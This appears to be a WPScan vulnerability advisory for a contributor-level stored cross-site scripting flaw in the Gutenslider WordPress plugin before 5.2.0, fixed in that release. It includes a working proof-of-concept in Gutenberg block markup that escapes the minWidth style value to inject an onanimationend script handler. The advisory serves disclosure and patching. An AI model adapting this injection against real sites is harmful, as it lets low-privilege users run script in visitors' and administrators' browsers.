WordPress Plugin Vulnerabilities
Gutenslider < 5.2.0 - Contributor+ Stored XSS
Description
The plugin does not escape the minWidth attribute of a Gutenburg block, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks
Proof of Concept
As a contributor (or above), create/edit a post, put the below code while in Code Editor mode, and view/preview the post (The payload is specific to the TwentyTwentyOne theme and will trigger without user interaction, but could be changed)
<!-- wp:eedee/block-gutenslider {"gsBlockId":"fzk82qf0m"} -->
<!-- wp:eedee/block-gutenslide {"background":{"backgroundType":"color","backgroundOverlayImage":"","backgroundOverlayVideo":"","backgroundOverlayOpacity":50,"backgroundGradient":{},"backgroundImage":{},"backgroundPosition":"center center","backgroundRepeat":"no-repeat","backgroundImageSize":"cover","backgroundVideoSize":"cover","customBackgroundColor":"","hasParallax":false,"backgroundFocalPoint":{"x":0.5,"y":0.5},"backgroundVideoFocalPoint":{"x":0.5,"y":0.5},"backgroundVideo":{},"backgroundVideoMuted":true,"backgroundVideoLoop":true,"backgroundVideoAutoplay":true,"openPopover":true,"backgroundColor":"white"},"minWidth":"100px;animation-name:twentytwentyone-close-button-transition;\u0022 onanimationend=\u0022alert(origin)//"} -->
<!-- wp:paragraph {"align":"center","placeholder":"Add slide content here","className":"gutenslider-content-initial","fontSize":"larger"} -->
<p class="has-text-align-center gutenslider-content-initial has-larger-font-size">Slider AAAA</p>
<!-- /wp:paragraph -->
<!-- /wp:eedee/block-gutenslide -->
<!-- /wp:eedee/block-gutenslider -->
Affects Plugins
Fixed in 5.2.0 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-18 (about 2 years ago)
Added
2021-08-18 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)
WPScan 